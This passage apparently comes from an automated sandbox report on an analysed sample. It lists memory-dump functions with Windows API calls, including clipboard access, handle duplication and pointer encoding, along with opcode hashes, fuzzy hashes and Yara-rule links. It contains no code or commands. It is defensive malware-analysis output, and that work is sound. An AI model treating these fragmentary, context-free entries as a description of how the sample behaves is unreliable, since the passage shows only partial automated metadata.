                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: ddbcebd49608e6dd56597e72ee7c4eee758674d4de4f0fd886170cee7b9fbcef
                                                                                                                                                                                                                          • Instruction ID: f3941a5be3340ce18b5527c8966903da73b79c1a8072d9f2e0a917f96ba9cc45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddbcebd49608e6dd56597e72ee7c4eee758674d4de4f0fd886170cee7b9fbcef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1231C0B19083948FDB01DFA8D9446DEBFF0AF09224F19449AD449E7752D7389885CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B9779C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02B97F09
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                                                                          • Opcode ID: ef350b8a9fbb42a7d22be318b613b45340e75b12fd6725f8a55da094558f7e35
                                                                                                                                                                                                                          • Instruction ID: be563126dff57e4532e135f7ee5ec2cb501568c3941bd3e1dd354ca875a46846
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef350b8a9fbb42a7d22be318b613b45340e75b12fd6725f8a55da094558f7e35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68414EB5A103458FDB14CF99C548BAAFBF9FF88314F258499E419AB721D734A841CFA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B9C199, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02B9C222
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                                                          • Opcode ID: 3e58b90b716378b25d87f8afc21e7d7c11c9b5cc2a603a3eb0149da1915943e1
                                                                                                                                                                                                                          • Instruction ID: 9aa5ef7f9001e14fc1e389337fcc094954ac504a68027df55c06598cc7e93c81
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e58b90b716378b25d87f8afc21e7d7c11c9b5cc2a603a3eb0149da1915943e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5431D3B58093448FDB10CFA8E50579EBFF0EF49728F1484AAD444B7242D7789484CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05EDC820, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 220874293-0
                                                                                                                                                                                                                          • Opcode ID: 4b959b51b5c9cb9bd9372319c98ba9bd5f8691b594859af8197285628910216b
                                                                                                                                                                                                                          • Instruction ID: 3ab08837b4d4c4fcb9fbe19d85dafcb2afb7e15406a60b5619bd257d45ad2236
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b959b51b5c9cb9bd9372319c98ba9bd5f8691b594859af8197285628910216b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E73102B0A01218DFDB10CF99C984BDEFBF5AB48358F248019E449BB390D774A946CF61
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05EDCE2D, Relevance: 1.6, APIs: 1, Instructions: 73comclipboardCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 220874293-0
                                                                                                                                                                                                                          • Opcode ID: b9a9a89b64c1b191c297407bf600afc56847a965b661d06c8f9c373bc9ed5364
                                                                                                                                                                                                                          • Instruction ID: 704c96f3b59efb25817f9c0580f57a7f4ee194f3e6413fd7c9c1b8f634014b85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9a9a89b64c1b191c297407bf600afc56847a965b661d06c8f9c373bc9ed5364
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E131F2B0A012589FDB14CF99C984BDDFBF1AB48368F248019E449BB390D774A986CF61
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B96B62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B96BEF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          • Opcode ID: 962d9b60a42695fbd78a1e1ab9b6f8c50c453a3144cb977569856fe8f2211ba5
                                                                                                                                                                                                                          • Instruction ID: 8e1726b99360de6e2ae068a5ec5906b44ef7f4d6f0c8f35e4a4f04efb871a933
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 962d9b60a42695fbd78a1e1ab9b6f8c50c453a3144cb977569856fe8f2211ba5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA2114B59002489FDF10CFA9D584ADEBFF8EB48324F14845AE814B3350D378A944CFA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B96B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B96BEF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          • Opcode ID: a95874419c750cbea3a7dfce0f86d4a6f5f5d36f52f00cfa02054d06fa9ad1ce
                                                                                                                                                                                                                          • Instruction ID: f102433ceb6654fbdbc73de330bebec1c198349744b6842b8ab6c2c66d12a124
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a95874419c750cbea3a7dfce0f86d4a6f5f5d36f52f00cfa02054d06fa9ad1ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F721E4B59002089FDF10CFA9D584ADEBBF8EB48324F14845AE814B3710D378A944CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B9C1A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02B9C222
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                                                          • Opcode ID: 855385289f65652835a232d3cfd8c27f874cce58bfc4d963d80339588ee8a74a
                                                                                                                                                                                                                          • Instruction ID: a1138cef99c639eed90ed71c5163c04fdee9b86df76b3de75c8cfe0b1ee55b84
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 855385289f65652835a232d3cfd8c27f874cce58bfc4d963d80339588ee8a74a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4116AB29003058FDF10DFA9D60979EBFF4EB59728F20846AD445B3640DB38A985CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05ED924C, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05EDC127), ref: 05EDC1BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: cf80bb7484c367295621f6ac1a19e60f01a71885735dc43f3311046c096934e9
                                                                                                                                                                                                                          • Instruction ID: 2e42d55a019cf61e1fae0e2380530bc7afc19bcfee3b479be3370c73b726b95e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf80bb7484c367295621f6ac1a19e60f01a71885735dc43f3311046c096934e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E1143B59002088FCB10CF99D944BDEFBF4AB48324F208419D859B3700D778A844CFA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05EDC70C, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 05EDCD45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                          • Opcode ID: dfb6a82253eb5378ca73c642cb994d2b1a3c4ab80153b830b7fe855a2d53f642
                                                                                                                                                                                                                          • Instruction ID: 5f2dfe17243fb639f5825365cb7472111bfb66f529c1bc5537d176388dbf8034
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfb6a82253eb5378ca73c642cb994d2b1a3c4ab80153b830b7fe855a2d53f642
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 171145B59002088FCB10CF99D545BDEFBF4EB48324F208459D959B7700D378A944CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05EDCCE8, Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 05EDCD45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                          • Opcode ID: 8ae811104940c4714358efd44d3908903b13ad1391ace5840d69157ee5b2f0d3
                                                                                                                                                                                                                          • Instruction ID: 2cb4c1438398a9a30fe309938685d7619dbd4a9ed8310c9edc080f80e566218c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ae811104940c4714358efd44d3908903b13ad1391ace5840d69157ee5b2f0d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 001118B5900249CFCB10CF99D585BDEFBF4AB48328F25845AD459B7710D378A944CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00F4D53C, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914169018.0000000000F4D000.00000040.00000001.sdmp, Offset: 00F4D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e468057fdb3092a830dc345f7cc94cec792f31fc30fbb44a78f99463e11941eb
                                                                                                                                                                                                                          • Instruction ID: a32197bbb41522433c89b5c0a4279999d4179f508ff4e9fb47ad26ab20ffb7a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e468057fdb3092a830dc345f7cc94cec792f31fc30fbb44a78f99463e11941eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821F8B2504244DFDB05DF10D9C0B26BF65FB94328F288569EC094B646C736D856EBA2
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0115D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914651584.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3619740536f4726c549f144c8e6a57bbbace810c241651777ebed70d34a85dc0
                                                                                                                                                                                                                          • Instruction ID: 9c1c66b513f5f543941268b57f1b6168fbb9ef2e552f5445af6c6ceb6b910f71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3619740536f4726c549f144c8e6a57bbbace810c241651777ebed70d34a85dc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B210071504240DFDF59CF64E9C0B26BB65EB88364F20C5A9DC094B346C33AD806CBA2
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0115D006, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914651584.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cad424240adba55ea7c3610c015d663ad6ee2b76e2da273ca966d29cebeb9102
                                                                                                                                                                                                                          • Instruction ID: 68b25f0c15281ae8c26f200525ec5327f4f76f1deb39729697c3f4d40202dab1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cad424240adba55ea7c3610c015d663ad6ee2b76e2da273ca966d29cebeb9102
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04219D75509380CFDB16CF24D990B15BF71EB46214F28C5EAD8498B6A7C33AD84ACB62
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00F4D537, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914169018.0000000000F4D000.00000040.00000001.sdmp, Offset: 00F4D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5489b5139215f7946c11f861f28fde3f9b8c3c98504d281816d0274170f2923a
                                                                                                                                                                                                                          • Instruction ID: 53a934aff4d93be43fa0e0d10cf3c528e3b2030a54fcd2994c5b593d3d237e6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5489b5139215f7946c11f861f28fde3f9b8c3c98504d281816d0274170f2923a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F11B176904280CFCB12CF10D5C4B16BF72FB94324F28C6A9DC094B656C336D856DBA2
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions